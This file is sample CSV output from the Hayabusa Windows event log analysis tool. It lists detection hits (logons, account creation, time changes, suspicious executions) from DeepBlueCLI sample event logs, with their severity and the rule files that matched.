hayabusa/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
Tanaka Zakku 4a73a8c66c Sample results
2021-12-22 11:27:06 +09:00

10074 lines
3.7 MiB
Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
